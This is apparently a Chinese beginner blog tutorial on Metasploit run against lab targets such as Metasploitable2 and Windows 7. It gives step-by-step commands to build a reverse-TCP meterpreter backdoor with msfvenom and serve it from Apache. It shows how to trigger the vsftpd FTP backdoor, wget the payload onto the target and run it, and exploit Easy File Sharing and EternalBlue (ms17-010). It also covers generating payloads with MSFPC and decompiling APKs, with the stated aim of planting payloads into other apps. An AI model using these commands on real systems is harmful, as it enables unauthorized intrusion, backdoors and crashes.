黑客玩具入门——5、继续Metasploit

2023-12-01 10:56:53 浏览数 (1)

1、利用FTP漏洞并植入后门

实验靶机:Metasploitable2。

实践:

  1. 使用nmap扫描目标靶机
    1. nmap -sV xxx.xxx.xxx.xxx(目标ip)
  2. 生成linux系统后门
    1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx(主控端ip) LPORT=5555 -f elf -o /home/xxxx(用户名)/backdoor.elf
  3. 使用Apache服务在目标主机上下载后门
    1. sudo service apache2 start
    2. sudo cp home/xxxx(用户名)/backdoor.elf /var/www/html/
  4. 在主控端浏览器打开apache服务的ip地址,然后右键elf文件,选择Copy Link Location。
  5. 手工激活ftp后门。登录名:user:)。密码:pass
    1. 在主控端命令行输入:ftp xxx.xxx.xxx.xxx(靶机ip)。
    2. 输入登录名密码即可。
    3. 可以通过:nc xxx.xxx.xxx.xxx(靶机ip)。尝试判断是否启用成功。
  6. 然后在nc的命令行中执行下面的命令,这个地址就是你之前右键复制的那个地址。
    1. wget http://192.168.10.129/backdoor.elf。
    2. 然后可以通过 cd / --> ls命令。看有没有这个文件。
  7. 然后,启用主控端。打开Metasploit,就跟之前一样。
    1. use exploit/multi/handler
    2. set payload linux/x86/meterpreter/reverse_tcp
    3. set lhost xxx.xxx.xxx.xxx(主控端ip)
    4. set lport 5555
    5. run
  8. 在目标主机上运行后门。以下命令在nc的命令行中操作:
    1. ./backdoor.elf。你会发现权限不足。
    2. chmod 7777 ./backdoor.elf。
    3. 然后再执行就可以了:./backdoor.elf。
  9. 然后,你就可以在meterpreter中为所欲为了。

2、常用攻击软件

由于Windows7使用了比较安全的机制,所以入侵win7远比入侵Windows xp要难得多。虽然系统本身很安全,但是我们不可能只安装一个系统,就什么都没有了,系统内我们还会安装很多软件,我们就可以从这些应用软件入手,去寻找他们的漏洞,借助这些软件做跳板,去入侵系统。

之前我们使用的是python脚本去攻击Easy File Sharing软件,使软件卡死。并成功在目标计算机上打开了计算器,这回我们使用Metasploit来攻击这个应用程序。

实验靶机:Windows7。

实践:

  1. search easyfilesharing。
  2. use exploit/windows/http/easyfilesharing_seh。
  3. set rhost xxx.xxx.xxx.xxx(目标ip)。
  4. set lport 6666。
  5. run。
  6. execute -f calc.exe。打开计算器。

3、攻击Windows7系统蓝屏

实验靶机:Windows7。

实践:

  1. search ms17-010。
  2. use exploit/windows/smb/ms17_010_eternalblue。
  3. set rhost xxx.xxx.xxx.xxx(目标ip)。
  4. set lport 6666。
  5. set payload windows/meterpreter/reverse_tcp。
  6. run。
  7. 然后Windows就蓝屏了。

4、漏洞利用工具集:MSFPC

生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编辑器。虽然它是一个非常强的payload生成神器,但是对于一个新手来说,可能难以在短时间内熟悉其操作。即使在进程最初的了解之后,生成一个基本的payload也需要输入相当多的内容。

MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的payload生成器,它简化了基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单的创建Payload。

使用方法:

  1. 漏洞利用工具集 --> msf payload creator --> 打开他。
  2. sudo msfpc windows xxx.xxx.xxx.xxx(当前主机ip) 6666。
  3. 然后会生成这么多东西:
  1. 其实就是把我们之前通过手动配置的东西都自动生成了。包括可执行文件、命令脚本等。我们看下如何来使用这些东西
    1. sudo service apache2 start。
    2. 跟之前一样,把刚才生成的可执行文件复制到Apache目录下。这里不写了。
    3. msfconsole -q -r [上面生成的那个.rc文件地址]
    4. 查看session
    5. 使用session。
    6. 成功!

5、Payload 介绍

病毒通常会做一些有害的或者恶意的动作。在病毒代码中实现这个功能的部分叫做“有效载荷(Payload)”。Payload可以实现任何运行在受害者环境中的程序所能做的事情。并且能够执行动作包括破坏文件、删除文件、向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。

Payloads模块,也叫有效载荷或有效负载,也就是我们常说的shellcode。在MSF中为我们提供了大量的Payloads。我们可以再MSF中通过show payloads命令查看。

payloads模块的命名规则

操作系统/类型/模块名称:windows/shell/bind_tcp。

  1. shell_find_taf:在一个已建立的链接上创建一个shell
  2. shell_reverse_tcp:反向链接到攻击者主机并创建一个shell
  3. bind_tcp:监听一个tcp链接。
  4. reverse_tcp:反向建立tcp链接。
  5. add_user:创建一个新用户并添加到管理组。

payloads模块等级

等级代表好用程度,一般分为以下几个等级:

  1. normal:正常
  2. excellent:优秀
  3. great:极好
  4. good:好
  5. average:一般、平均
  6. manual:手动

查看payloads下的某个模块的详细信息

  1. info [模块名]
    • info windows/shell/bind_tcp

6、apk文件的反编译

1)什么是逆向工程?反编译?

就是将已有的APP程序,反向操作,方便我们查看里面的原始文件,因为我们平时拿到的APP程序都是经过加密处理的。

2)反编译有什么用?

可以用来分析APP,比如获取IP地址。将payload植入其他APP等等。

3)APK反编译软件——apktool

  1. 反编译apk文件
  2. apktool d xxx.apk
  3. 将反编译后的文件重新打包
  4. apktool b xxx.apk

0 人点赞